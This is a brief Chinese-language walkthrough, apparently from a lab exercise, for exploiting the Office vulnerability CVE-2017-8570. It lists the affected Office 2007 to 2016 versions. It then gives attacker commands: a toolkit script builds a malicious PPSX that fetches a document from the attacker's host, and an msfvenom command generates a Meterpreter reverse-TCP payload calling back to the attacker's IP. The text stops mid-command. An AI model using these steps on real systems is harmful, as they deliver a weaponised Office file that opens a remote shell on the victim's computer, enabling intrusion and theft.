CVE-2017-8570影响office版本
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
一、使用exp:cve-2017-8570_toolkit.py
攻击机为192.168.43.141
目标机为192.168.43.128
攻击机:
python cve-2017-8570_toolkit.py -M gen -w test.ppsx -u http://192.168.43.141/a.doc //①
需要在exp目录下新建template文件夹,下有template.ppsx
生成test.ppsx,发送给目标机
攻击机:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.141 LPORT=4567 -f exe > shell.exemv